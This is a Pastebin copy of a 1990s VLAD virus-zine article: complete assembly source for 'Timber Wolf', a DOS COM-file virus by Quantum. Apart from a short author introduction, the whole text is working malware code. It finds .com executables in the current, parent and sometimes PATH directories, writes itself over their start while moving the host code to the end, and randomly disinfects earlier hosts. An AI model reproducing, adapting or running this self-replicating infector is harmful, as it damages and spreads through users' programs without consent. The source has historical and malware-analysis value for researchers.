FlyFar

VLAD Magazine - Issue #6 - ARTICLE.5_2 - Timber Wolf

Nov 19th, 2023
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 7.64 KB | Cybersecurity | 0 0
  1. ;
  2. ; "Timber Wolf" by Quantum / VLAD
  3. ;
  4. ; If you have a look at the animal kingdom, you can see two distinct groups
  5. ; of animals.  There are the ones who hide and breed as much as they can
  6. ; with the idea that the more offspring they have the more chance their
  7. ; species has for survival.  And then there are the ones who hunt those that
  8. ; hide, outrun any would-be predators, and have their offspring in large
  9. ; litters.  Most virii fall into the first category.  This virus falls
  10. ; into the second.
  11. ;
  12. ; It's a non-resident com infector that doesn't stay for long on the one
  13. ; executable.  It jumps from com to com, hunting appending, and prepending
  14. ; com infections.  If it comes in contact with another one of its kind they
  15. ; will run together in a pack but still with an individual nature - randomly
  16. ; selecting whether to move and what to attack.
  17. ;
  18.  
  19. vstart:
  20.  
  21. mov si,offset retcode               ; put the return code far
  22. mov di,0fcedh - (vend - vstart) - (vend - retcode) - 2
  23. mov cx,(vend-retcode)/2+1
  24. rep movsw
  25.  
  26. genretcodeend:
  27.  
  28. mov ax,[2ch]    ; get the segment of the enviroment
  29. mov ds,ax
  30. xor si,si       ; start at offset 0
  31. loop1:
  32. lodsb           ; look for a zero
  33. or al,al
  34. jnz loop1
  35. lodsb           ; followed by another zero
  36. or al,al
  37. jnz loop1
  38. lodsw
  39. cmp ax,1        ; then a 1 and a zero
  40. jnz loop1
  41. mov di,0fcf0h   ; si now points to the arg 0
  42. xor cx,cx       ; count the num of bytes copied
  43. loop2:
  44. lodsb
  45. inc cx
  46. or al,al        ; stop on a zero
  47. jz outty1
  48. cmp al,"a"      ; convert lowercase to uppercase
  49. jb noand
  50. cmp al,"z"
  51. ja noand
  52. and al,5fh
  53. noand:
  54. stosb           ; copy byte
  55. jmp loop2
  56. outty1:
  57. stosb           ; dont forget the final zero
  58.  
  59. push cs
  60. pop ds
  61. mov [0fcedh],cx  ; store the num of bytes copied
  62.  
  63. mov ah,1ah
  64. mov dx,0fdf0h    ; set the dta
  65. int 21h
  66.  
  67. mov ah,47h
  68. xor dx,dx
  69. mov si,0fcedh - (vend - vstart) - (vend - retcode) - 2 - 64
  70. int 21h
  71.  
  72. mov byte ptr [si-1],"\"
  73.  
  74. in al,40h
  75. cmp al,53            ; one in 256 chance that we go dot dot regardless
  76. jz godadotdot
  77. cmp al,61            ; one in 256 chance that we infect the path
  78. jnz finddafirst
  79.  
  80. mov ax,[2ch]
  81. mov es,ax
  82.  
  83. mov al,"P"
  84. xor di,di
  85. findp:
  86. mov cx,0ffffh
  87. repne scasb                       ; search for a "P"
  88. mov si,offset ath
  89. mov cx,3
  90. rep cmpsb                         ; next 3 bytes = "ATH" ?
  91. jnz findp
  92. mov al,";"
  93. push es
  94. pop ds
  95. lea dx,[di+1]                     ; dx = path 2 infect
  96. mov cx,0ffffh
  97. repne scasb                       ; search for a ";"
  98. mov byte ptr [di-1],0             ; replace with a zero
  99. mov ah,3bh
  100. ;int 21h                           ; change into that dir
  101. push cs
  102. push cs
  103. pop ds
  104. pop es
  105. finddafirst:
  106. mov ah,4eh
  107. xor cx,cx
  108. mov dx,offset fspec   ; find first com
  109. int 21h
  110. isitkewl:
  111. jnc checkinfect
  112. godadotdot:
  113. mov ah,3bh
  114. mov dx,offset dotdot
  115. int 21h
  116. jnc finddafirst
  117. outtyout:
  118. mov ah,3bh
  119. mov dx,0fcedh - (vend - vstart) - (vend - retcode) - 2 - 64 - 1
  120. int 21h                 ; change to original dir
  121. jmp 0fcedh - (vend - vstart) - (vend - retcode) - 2 ; outtie on error
  122. checkinfect:
  123. mov si,0fdf0h+1eh
  124. mov di,0fcedh-80h
  125. push di
  126. mov ah,60h
  127. int 21h               ; generate fully qualified filename
  128. pop di
  129. mov si,0fcf0h
  130. mov dx,di
  131. mov cx,[0fcedh]
  132. rep cmpsb             ; found file = arg 0 ?
  133. jnz infectit
  134. thatnogood:
  135. mov ah,4fh
  136. int 21h               ; if so find next file
  137. jmp isitkewl
  138. infectit:
  139.  
  140. in al,40h
  141. cmp al,23                     ; random enough chance that we wont infect
  142. ja thatnogood
  143. cmp word ptr [0fdf0h + 1ah],vend-vstart         ; found file big enough ?
  144. jb thatnogood
  145. cmp word ptr [0fdf0h + 1ah],0fcedh - (vend - vstart) - (vend - retcode) - 2 - 64
  146. ja thatnogood                                   ; found file too big ?
  147.  
  148. mov ax,3d02h
  149. int 21h                 ; open in read/write mode
  150.  
  151. xchg bx,ax
  152.  
  153. mov ah,3fh
  154. mov cx,vend-vstart                     ; read in where the virus will go
  155. mov dx,0fcedh - (vend - vstart)
  156. int 21h
  157.  
  158. call seeke                        ; goto end of file
  159.  
  160. add ax,100h                         ; calculate where the host code will be
  161. mov [offset whereorgat],ax
  162.  
  163. mov cx,vend - vstart          ; write the host code to end of the file
  164. mov dx,0fcedh - (vend - vstart)
  165. call writefile
  166.  
  167. call seeks                        ; back to the start of the file
  168.  
  169. inc byte ptr [offset infectcount]
  170. cmp byte ptr [offset infectcount],15
  171. jb nokillcount
  172. mov byte ptr [offset infectcount],0
  173. nokillcount:
  174.  
  175. mov cx,vend-vstart                  ; write out the virus code
  176. mov dx,0100h
  177. call writefile
  178.  
  179. mov ah,3eh                          ; close file
  180. int 21h
  181.  
  182. in al,40h
  183. and al,111b
  184. inc al
  185. cmp byte ptr [offset infectcount],al
  186. ja disinfect
  187.  
  188. jmp outtyout                        ; back 2 host
  189.  
  190. disinfect:
  191.  
  192. mov ax,03d02h                       ; open arg 0
  193. mov dx,0fcf0h
  194. int 21h
  195.  
  196. xchg bx,ax
  197.  
  198. mov dx,offset whereorgat-100h -1  ; goto "mov si,whereorgat" in our code
  199. call seek2dx
  200.  
  201. mov ah,3fh                          ; read it in
  202. mov cx,3
  203. mov dx,0fcedh - (vend - vstart)
  204. int 21h
  205.  
  206. ; if the mov si, bit isn't there then we have been done by a prepending
  207. cmp byte ptr [0fcedh - (vend - vstart)],0beh
  208. jz continuedisinfect
  209.  
  210. call seeke       ; seek to the end of the file
  211.  
  212. sub ax,genretcodeend-vstart    ; sub off the size of the first bit of our code
  213. mov dx,ax
  214. call seek2dx                 ; seek to that pos
  215.  
  216.  
  217. readincode:
  218.  
  219. mov ah,3fh                             ; read in the string
  220. mov cx,genretcodeend-vstart
  221. mov dx,0fcedh - (vend - vstart) + 3
  222. mov si,dx
  223. push cx
  224. int 21h
  225. pop cx
  226.  
  227. mov di,0100h                           ; is it our code ?
  228. rep cmpsb
  229. jz foundmycode
  230. call seekc                             ; no.. get the current position
  231.  
  232. dec ax                                 ; decrease by one
  233. mov dx,ax
  234. call seek2dx                          ; goto that pos
  235. or ax,ax               ; if we're at the top of the file then all is not good
  236. jnz readincode
  237. ; fucking overwriting virus wasted our code!!!!!!
  238. mov ah,3eh                    ; let's just leave
  239. int 21h
  240. jmp outtyout
  241. foundmycode:                    ; we found the string
  242. mov ah,3fh                      ; read in the rest of the file
  243. mov cx,0ffffh
  244. mov dx,0fcedh - (vend - vstart)
  245. int 21h
  246.  
  247. push ax                    ; back to the start of the file
  248. push dx
  249. call seeks
  250. pop dx
  251. pop cx
  252.  
  253. call writefile              ; write the code back
  254.  
  255. continuedisinfect:          ; continue the disinfection
  256.  
  257. mov dx,[0fcedh - (vend - vstart) + 1]   ; goto where da original code is at
  258. dec dh
  259. push dx
  260. call seek2dx
  261.  
  262. mov ah,3fh                          ; read in the original host code
  263. mov cx,vend-vstart
  264. mov dx,0fcedh - (vend - vstart) + 3
  265. int 21h
  266.  
  267. call seeks                       ; back to the start of the file
  268.  
  269. mov cx,vend-vstart                  ; write out the host code
  270. mov dx,0fcedh - (vend - vstart) + 3
  271. call writefile
  272.  
  273. pop dx
  274. call seek2dx                      ; back to the orginal EOF
  275.  
  276. xor cx,cx                           ; cut off the rest of the file
  277. call writefile
  278.  
  279. mov ah,3eh                          ; close the file
  280. int 21h
  281.  
  282. jmp outtyout
  283.  
  284. seek2dx: mov ax,04200h
  285.          jmp seek1
  286. seekc: mov ax,04201h
  287.        jmp lseek
  288. seeks: mov ax,04200h
  289.        jmp lseek
  290. seeke: mov ax,04202h
  291. lseek: xor dx,dx
  292. seek1: xor cx,cx
  293.        int 21h
  294.        ret
  295.  
  296.  
  297. writefile: mov ah,40h
  298.            int 21h
  299.            ret
  300.  
  301. db "Timber Wolf by Quantum / VLAD",0
  302. ath db "ATH"
  303. dotdot db "..",0
  304. infectcount db 0
  305. fspec db "*.com",0
  306. retcode:
  307. db 0beh                             ; mov si,
  308. whereorgat dw offset orghost
  309. mov di,0100h
  310. push di
  311. mov cx,vend - vstart
  312. rep movsb                           ; move original code back to 100h
  313. ret                                 ; jump there
  314. vend:
  315. ; host code
  316. orghost:
  317. int 20h
  318.  
Add Comment
Please, Sign In to add comment